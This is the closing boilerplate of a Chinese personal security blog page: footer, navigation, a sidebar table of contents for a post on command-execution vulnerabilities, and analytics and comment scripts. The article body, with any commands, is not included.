<p><a href="https://cloud.tencent.com/developer/article/1141143" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1141143</a></p>

      
    </div>
    
    
    


<div>
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>
    
</div>
</div>
 

    

    

    



    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/24/web安全之XSS漏洞学习实战/" rel="next" title="web安全之XSS漏洞学习实战">
                <i class="fa fa-chevron-left"></i> web安全之XSS漏洞学习实战
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="SOHUCS"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/avatar.jpg" alt="Darren-zl">
            
              <p class="site-author-name" itemprop="name">Darren-zl</p>
              <p class="site-description motion-element" itemprop="description">一天一小步，随着时间的积累，你将会发现你其实已经走了很远。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Darren-zl" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://weibo.com/p/1005052390784733/home?from=page_100505&mod=TAB&pids=plc_main" target="_blank" title="Weibo">
                      
                        <i class="fa fa-fw fa-weibo"></i>Weibo</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB-安全之命令执行漏洞学习实战"><span class="nav-number">1.</span> <span class="nav-text">WEB 安全之命令执行漏洞学习实战</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-命令执行漏洞"><span class="nav-number">1.0.1.</span> <span class="nav-text">1.命令执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-1-Windows管道符"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">1.1 Windows管道符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#1-2-Linux管道符"><span class="nav-number">1.0.1.2.</span> <span class="nav-text">1.2 Linux管道符</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#接下来用system函数进行简单的验证："><span class="nav-number">1.0.1.3.</span> <span class="nav-text">接下来用system函数进行简单的验证：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-通过命令执行漏洞传输文件"><span class="nav-number">1.0.2.</span> <span class="nav-text">2.通过命令执行漏洞传输文件</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#2-1-通过powershell下载"><span class="nav-number">1.0.2.1.</span> <span class="nav-text">2.1 通过powershell下载</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-2-也可以通过UVC读取文件"><span class="nav-number">1.0.2.2.</span> <span class="nav-text">2.2 也可以通过UVC读取文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-3-通过CScript-WScript"><span class="nav-number">1.0.2.3.</span> <span class="nav-text">2.3 通过CScript/WScript</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-4-通过Bitsadmin"><span class="nav-number">1.0.2.4.</span> <span class="nav-text">2.4 通过Bitsadmin</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-5-通过Certutil"><span class="nav-number">1.0.2.5.</span> <span class="nav-text">2.5 通过Certutil</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-6-通过debug"><span class="nav-number">1.0.2.6.</span> <span class="nav-text">2.6 通过debug</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-7-通过ftp"><span class="nav-number">1.0.2.7.</span> <span class="nav-text">2.7 通过ftp</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-8-通过CSC"><span class="nav-number">1.0.2.8.</span> <span class="nav-text">2.8 通过CSC</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-9-通过JScript"><span class="nav-number">1.0.2.9.</span> <span class="nav-text">2.9 通过JScript</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-对命令执行输入口过滤，杜绝命令执行问题"><span class="nav-number">1.0.3.</span> <span class="nav-text">3.对命令执行输入口过滤，杜绝命令执行问题</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#3-1-特殊字符过滤"><span class="nav-number">1.0.3.1.</span> <span class="nav-text">3.1 特殊字符过滤</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-2-限制危险参数"><span class="nav-number">1.0.3.2.</span> <span class="nav-text">3.2 限制危险参数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-3-杜绝系统层漏洞以及第三方组件漏洞。"><span class="nav-number">1.0.3.3.</span> <span class="nav-text">3.3 杜绝系统层漏洞以及第三方组件漏洞。</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-4-针对真实项目情况，选择不同的函数"><span class="nav-number">1.0.3.4.</span> <span class="nav-text">3.4 针对真实项目情况，选择不同的函数</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考链接："><span class="nav-number">1.0.4.</span> <span class="nav-text">参考链接：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Darren-zl</span>

  
</div>


  <!--<div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>-->



 <!-- <span class="post-meta-divider">|</span>-->



  <!--<div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  <div class="bg_content">
    <canvas id="canvas"></canvas>
</div>



  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  




  
    <script type="text/javascript">
    (function(){
      var appid = 'cytxCyGhU';
      var conf = '90b283bdb7ccb472f325f3c891156b33';
      var width = window.innerWidth || document.documentElement.clientWidth;
      if (width < 960) {
      window.document.write('<script id="changyan_mobile_js" charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf + '"><\/script>'); } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://changyan.sohu.com/upload/changyan.js",function(){
        window.changyan.api.config({appid:appid,conf:conf})});
      }
    })();
    </script>
    <script type="text/javascript" src="https://assets.changyan.sohu.com/upload/plugins/plugins.count.js"></script>
  









  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("29xnQ1C2kcwORHYYn7xsWTnS-gzGzoHsz", "Rq1Gk75oRwH78BryWUL4oYzj");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  



</body>
</html>
